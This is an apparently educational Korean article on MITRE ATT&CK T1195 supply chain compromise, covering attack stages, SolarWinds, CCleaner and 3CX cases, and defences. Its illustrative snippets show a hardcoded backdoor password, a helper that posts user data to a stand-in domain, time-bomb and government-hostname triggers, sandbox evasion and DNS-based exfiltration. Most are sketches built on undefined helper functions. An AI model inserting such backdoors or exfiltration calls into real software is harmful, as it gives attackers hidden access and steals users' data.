T1195 Supply Chain Compromise: 공급망 침해의 완전한 기술 분석

I. 왜 공급망 공격이 등장했는가

2020년 SolarWinds 사건으로 다수의 조직이 동시에 침해당했다. 이는 단일 공급업체 하나의 타협이 얼마나 파괴적일 수 있는지 보여준 역사적 사건이었다.

전통적인 사이버 공격에서 공격자들은 각 조직의 방어막을 개별적으로 뚫어야 했다. 방화벽, EDR, 침입탐지시스템 등 다층 보안을 하나씩 우회하는 것은 시간과 비용이 많이 드는 작업이었다. 특히 대기업이나 정부기관처럼 보안이 강화된 환경일수록 직접 침투는 거의 불가능에 가까웠다.

하지만 공격자들은 더 효율적인 방법을 발견했다. 신뢰받는 소프트웨어나 하드웨어 공급업체를 먼저 침해한 후, 그들의 제품을 통해 수많은 고객사에 동시에 침투하는 것이다. 이는 마치 은행 금고를 직접 뚫는 대신, 금고 제조업체에서 백도어를 심어놓고 모든 은행에 배송하는 것과 같다.

공급망 공격의 핵심 이점:

신뢰 관계 악용: 고객은 공급업체를 신뢰하므로 의심하지 않음
대량 감염: 하나의 침해로 다수 조직 동시 타격
탐지 회피: 정상 업데이트 채널을 통해 배포되므로 의심받지 않음

II. T1195 기본 정의 및 개념

한 문장 정의

Supply Chain Compromise(T1195)는 공격자가 소프트웨어나 하드웨어가 최종 사용자에게 전달되기 전에 공급망의 어느 단계에서든 제품을 조작하여 악성 기능을 삽입하는 공격 기법이다.

공식 정의

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. — MITRE ATT&CK T1195

MITRE ATT&CK 프레임워크에서 T1195는 Initial Access 전술에 분류되며, 공격자가 초기 접근을 얻기 위해 신뢰받는 공급망을 악용하는 모든 기법을 포괄한다.

핵심 구성 요소

공급업체(Supplier): 소프트웨어나 하드웨어를 개발/제조하는 조직
공급망(Supply Chain): 제품이 개발부터 배포까지 거치는 모든 단계
배포 채널(Distribution Channel): 제품이 최종 사용자에게 전달되는 경로
신뢰 관계(Trust Relationship): 고객과 공급업체 간의 암묵적 신뢰
감염 벡터(Infection Vector): 악성 코드가 삽입되는 구체적 위치

용어	설명
Supply Chain Compromise	정의: 공급망 전체 단계에서의 제품 조작 / 공격 시점: 개발~배포 전 과정 / 영향 범위: 다수 조직 동시
Software Supply Chain Attack	정의: 소프트웨어 개발/배포 과정 조작 / 공격 시점: 코딩~업데이트 단계 / 영향 범위: 소프트웨어 사용자 전체
Hardware Supply Chain Attack	정의: 하드웨어 제조/배송 과정 조작 / 공격 시점: 제조~배송 단계 / 영향 범위: 하드웨어 구매자 전체
Dependency Confusion	정의: 패키지 의존성 이름 혼동 악용 / 공격 시점: 패키지 설치 시점 / 영향 범위: 특정 개발 환경
Typosquatting	정의: 유명 패키지명과 유사한 악성 패키지 / 공격 시점: 패키지 검색/설치 시 / 영향 범위: 오타 입력 사용자

III. T1195 공격의 동작 원리

전체 공급망 공격 흐름

다이어그램

A. 공급업체 침해 단계 (Initial Compromise)

공격자는 먼저 타겟 공급업체의 시스템에 침입한다. 이 단계에서 주로 노리는 대상은:

1. 개발자 워크스테이션

개발자 개인 PC나 노트북 침해
소스코드 저장소 접근 권한 탈취
IDE나 빌드 도구에 악성 플러그인 설치

2. CI/CD 파이프라인

yaml

# 침해된 GitHub Actions 예시
name: Build and Deploy
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout code
      uses: actions/checkout@v3
    - name: 악성 단계 (공격자가 삽입)
      run: |
# curl-pipe-bash cradle — Linux 셸 페이로드 즉시 실행
        # 정상 빌드 과정도 계속 진행하여 의심 회피
    - name: Build application
      run: npm run build

3. 소스코드 저장소

Git 저장소 직접 조작
커밋 히스토리에 악성 코드 은밀히 삽입
Pull Request 검토 과정 우회

B. 제품 조작 단계 (Product Manipulation)

침해가 완료되면 공격자는 제품에 악성 기능을 삽입한다.

소프트웨어 조작 방법:

python

# 정상 함수에 백도어 코드 삽입 예시
def authenticate_user(username, password):
    # 정상 인증 로직
    if validate_credentials(username, password):
        return True
    
    # 공격자가 삽입한 백도어 (숨겨진 마스터 키)
    if password == "SolarWinds123!@#" and username.startswith("admin"):
        log_backdoor_access(username)  # C&C 서버로 접근 로그 전송
        return True
    
    return False

def log_backdoor_access(user):
    # 정상 로깅으로 위장하면서 C&C 서버와 통신
    import requests
    try:
        requests.post("https://legitimate-looking-domain.com/api/log", 
                     data={"user": user, "timestamp": time.now()},
                     timeout=2)
    except:
        pass  # 네트워크 오류 시 조용히 실패하여 의심 회피

하드웨어 조작 방법:

칩셋에 하드웨어 백도어 삽입
펌웨어 레벨에서 원격 접근 기능 추가
네트워크 장비의 관리 인터페이스 조작

C. 배포 및 활성화 단계 (Distribution & Activation)

조작된 제품은 정상적인 배포 채널을 통해 고객에게 전달된다.

배포 채널 악용:

공식 업데이트 서버: 자동 업데이트 메커니즘 활용
패키지 저장소: npm, PyPI, Maven Central 등
앱스토어: 모바일 앱 배포 플랫폼
하드웨어 유통업체: OEM, 리셀러 네트워크

백도어 활성화 조건:

python

# 시간 지연 활성화 (Time-bomb)
import datetime
activation_date = datetime.datetime(2024, 3, 15)
if datetime.datetime.now() > activation_date:
    activate_backdoor()

# 특정 환경에서만 활성화 (환경 인식)
import socket
hostname = socket.gethostname()
if "gov.kr" in hostname or "mil.kr" in hostname:
    activate_advanced_payload()

# 네트워크 연결 확인 후 활성화
def check_internet_connection():
    try:
        socket.create_connection(("8.8.8.8", 53), timeout=3)
        return True
    except:
        return False

if check_internet_connection():
    establish_c2_channel()

D. T1195 하위 기법별 상세 분석

T1195.001: 소프트웨어 의존성 및 개발 도구 타협

현대 소프트웨어는 다수의 외부 라이브러리에 의존한다. 공격자는 이 의존성 체인에서 가장 약한 고리를 노린다.

의존성 체인 공격 예시:

json

// package.json - 정상적으로 보이는 의존성
{
  "dependencies": {
    "express": "^4.18.0",
    "lodash": "^4.17.21",
    "colors": "1.4.1"  // 실제로는 악성 패키지
  }
}

colors 패키지 침해 사례 (2022년):

인기 npm 패키지 colors와 faker의 개발자가 의도적으로 무한루프 코드 삽입
다수의 프로젝트가 동시에 영향받음
의존성 관리의 위험성을 보여준 대표 사례

T1195.002: 소프트웨어 공급망 타협

완성된 소프트웨어의 배포 과정에서 발생하는 침해다.

SolarWinds Orion 사례 분석:

csharp

// SUNBURST 백도어의 실제 코드 구조
public class OrionImprovementBusinessLayer
{
    // 정상 기능으로 위장
    public void UpdateOrionConfiguration()
    {
        // 12일 대기 후 활성화 (탐지 회피)
        if (GetCurrentTime() > activationTime.AddDays(12))
        {
            // DNS 요청을 통한 은밀한 C&C 통신
            string domain = GenerateDomainName();
            ResolveDNS(domain + ".avsvmcloud.com");
        }
    }
}

T1195.003: 하드웨어 공급망 타협

하드웨어 레벨에서 발생하는 가장 탐지하기 어려운 형태의 공격이다.

SuperMicro 사례 (2018년):

중국 제조업체가 서버 마더보드에 쌀알 크기의 악성 칩 삽입 의혹
미국 정부기관과 대기업 서버에 광범위하게 배포
하드웨어 공급망의 보안 취약성 부각

IV. 보안 관점: 공격자는 공급망을 어떻게 악용하는가

공격자가 공급망을 선택하는 이유

공격자에게 공급망 공격은 "투자 대비 수익률" 이 가장 높은 공격 방법이다. 하나의 공급업체만 침해하면 다수의 고객사를 동시에 장악할 수 있기 때문이다.

다이어그램

공격자의 타겟 선정 기준

1. 광범위한 고객 기반

많은 조직이 사용하는 소프트웨어 우선 선택
정부기관이나 대기업이 주 고객인 B2B 솔루션 선호

2. 자동 업데이트 메커니즘

사용자 개입 없이 자동으로 업데이트되는 제품
의심 없이 악성 코드가 설치될 가능성 높음

3. 높은 권한 레벨

시스템 관리 도구, 보안 솔루션, 네트워크 장비
관리자 권한으로 실행되는 소프트웨어

실제 공격 시나리오 및 사례

1. SolarWinds SUNBURST (2020)

공격 타임라인:

2019년 9월: 공격자가 SolarWinds 네트워크 침입
2019년 10월: Orion 소스코드에 SUNBURST 백도어 삽입
2020년 3월-6월: 감염된 업데이트를 다수 조직에 배포
2020년 12월: FireEye에 의해 발견

기술적 분석:

csharp

// SUNBURST의 도메인 생성 알고리즘 (DGA)
private string CreateSecureString(string input)
{
    // 조직 도메인명을 해시하여 고유 식별자 생성
    byte[] hash = ComputeHash(input);
    string subdomain = EncodeBytes(hash);
    
    // 각 피해자별로 다른 C&C 도메인 사용
    return subdomain + ".avsvmcloud.com";
}

피해 규모:

Microsoft, FireEye, Cisco 등 주요 기업 침해
미국 재무부, 국토안보부 등 정부기관 침해
대규모 경제적 피해 발생

2. CCleaner 공급망 침해 (2017)

공격 과정:

Piriform(CCleaner 개발사) 개발 환경 침해
CCleaner v5.33에 백도어 삽입
다수 사용자에게 배포
특정 대기업만 선별적으로 2차 페이로드 전송

cpp

// CCleaner 백도어의 데이터 수집 코드
void CollectSystemInfo()
{
    // 시스템 정보 수집
    GetComputerName();
    GetUserName(); 
    GetMACAddress();
    GetInstalledSoftware();
    
    // 특정 기업 대상 확인
    if (IsTargetOrganization())
    {
        DownloadSecondStagePayload();
    }
}

3. 3CX 이중 공급망 침해 (2023)

이 사례는 "공급망 공격의 공급망 공격" 이라는 전례 없는 복잡성을 보여줬다.

공격 체인:

1차 공급망 침해: X_TRADER 소프트웨어 침해
2차 공급망 침해: 3CX 개발자가 감염된 X_TRADER 사용
최종 배포: 3CX 고객사들에게 악성 업데이트 전파

탐지 회피 기법

1. 정상 기능 유지 공급망에서 침해된 제품은 정상 기능을 그대로 유지하면서 백도어만 추가한다.

python

def legitimate_function():
    # 정상 기능 수행
    result = perform_normal_operation()
    
    # 백도어는 별도 스레드에서 은밀히 실행
    threading.Thread(target=hidden_backdoor, daemon=True).start()
    
    return result

def hidden_backdoor():
    # 정상 네트워크 트래픽으로 위장
    time.sleep(random.randint(3600, 7200))  # 1-2시간 대기
    
    # DNS 쿼리로 C&C 통신 (HTTP보다 의심받지 않음)
    dns_query = f"{encode_data()}.legitimate-domain.com"
    socket.getaddrinfo(dns_query, None)

2. 환경 인식 (Environment Awareness) 백도어는 분석 환경을 탐지하고 회피한다.

python

def is_analysis_environment():
    checks = [
        check_vm_artifacts(),      # 가상머신 탐지
        check_debugger(),          # 디버거 탐지  
        check_sandbox_indicators(), # 샌드박스 탐지
        check_researcher_tools()   # 보안 연구 도구 탐지
    ]
    return any(checks)

if not is_analysis_environment():
    activate_payload()
else:
    # 분석 환경에서는 완전히 정상 동작
    perform_only_legitimate_functions()

3. 시간 지연 활성화 즉시 활성화하지 않고 수 주에서 수 개월 후 동작한다.

python

import datetime
import hashlib

# 설치 날짜 기반 활성화 시점 계산
def calculate_activation_time():
    install_date = get_installation_date()
    # 설치 후 30-90일 랜덤 대기
    delay_days = hash(get_system_id()) % 60 + 30
    return install_date + datetime.timedelta(days=delay_days)

if datetime.datetime.now() > calculate_activation_time():
    begin_malicious_activities()

방어 전략

1. 공급업체 보안 평가

소스코드 감사: 소프트웨어의 소스코드 직접 검토
빌드 환경 검증: 공급업체의 개발/빌드 프로세스 보안 확인
의존성 분석: 서드파티 라이브러리 보안 취약점 점검

2. 무결성 검증

bash

# 파일 해시 검증 자동화
#!/bin/bash
EXPECTED_HASH="a1b2c3d4e5f6..."
ACTUAL_HASH=$(sha256sum software.exe | cut -d' ' -f1)

if [ "$EXPECTED_HASH" != "$ACTUAL_HASH" ]; then
    echo "WARNING: File integrity compromised!"
    exit 1
fi

3. 네트워크 모니터링

python

# 비정상 DNS 요청 탐지
def detect_suspicious_dns():
    for query in dns_logs:
        # DGA 도메인 패턴 탐지
        if is_dga_domain(query.domain):
            alert(f"Possible DGA domain: {query.domain}")
        
        # 과도한 DNS 요청 탐지  
        if query.count > normal_threshold:
            alert(f"Excessive DNS queries: {query.domain}")

V. 정리 및 연결

T1195 Supply Chain Compromise는 현대 사이버 공격의 가장 강력하면서도 탐지하기 어려운 기법이다. 하나의 신뢰받는 공급업체를 침해하여 다수 조직을 동시에 장악할 수 있는 "레버리지 효과"가 핵심이다.

이 기법이 특히 위험한 이유는 기존 보안 모델의 근본적 가정인 "신뢰 관계" 를 악용한다는 점이다. 아무리 강력한 방어 시스템도 신뢰하는 공급업체로부터 오는 업데이트는 의심하지 않는다.

공급망 공격과 관련된 다른 공격 기법들도 함께 이해하면 전체적인 위협 환경을 파악할 수 있다.

앞으로 알아볼 주제들:

T1195.001: 개발 도구와 의존성을 통한 공급망 침해
T1195.002: 소프트웨어 배포 채널 조작 기법
T1195.003: 하드웨어 레벨 공급망 침해 방법

T1195 공급망 침해 공격, 11개 APT가 소프트웨어 의존성을 노린 패턴

T1195 Supply Chain Compromise: 공급망 침해의 완전한 기술 분석

I. 왜 공급망 공격이 등장했는가

II. T1195 기본 정의 및 개념

한 문장 정의

공식 정의

핵심 구성 요소

관련 용어 비교표

III. T1195 공격의 동작 원리

전체 공급망 공격 흐름

A. 공급업체 침해 단계 (Initial Compromise)

B. 제품 조작 단계 (Product Manipulation)

C. 배포 및 활성화 단계 (Distribution & Activation)

D. T1195 하위 기법별 상세 분석

IV. 보안 관점: 공격자는 공급망을 어떻게 악용하는가

공격자가 공급망을 선택하는 이유

공격자의 타겟 선정 기준

실제 공격 시나리오 및 사례

탐지 회피 기법

방어 전략

V. 정리 및 연결

관련 서브기법 분석

참고 자료

관련 글 더 보기

안내 및 법적 고지

T1195 Supply Chain Compromise: 공급망 침해의 완전한 기술 분석

I. 왜 공급망 공격이 등장했는가

II. T1195 기본 정의 및 개념

한 문장 정의

공식 정의

핵심 구성 요소

관련 용어 비교표

III. T1195 공격의 동작 원리

전체 공급망 공격 흐름

A. 공급업체 침해 단계 (Initial Compromise)

B. 제품 조작 단계 (Product Manipulation)

C. 배포 및 활성화 단계 (Distribution & Activation)

D. T1195 하위 기법별 상세 분석

IV. 보안 관점: 공격자는 공급망을 어떻게 악용하는가

공격자가 공급망을 선택하는 이유

공격자의 타겟 선정 기준

실제 공격 시나리오 및 사례

탐지 회피 기법

방어 전략

V. 정리 및 연결

관련 서브기법 분석

참고 자료

관련 글 더 보기

안내 및 법적 고지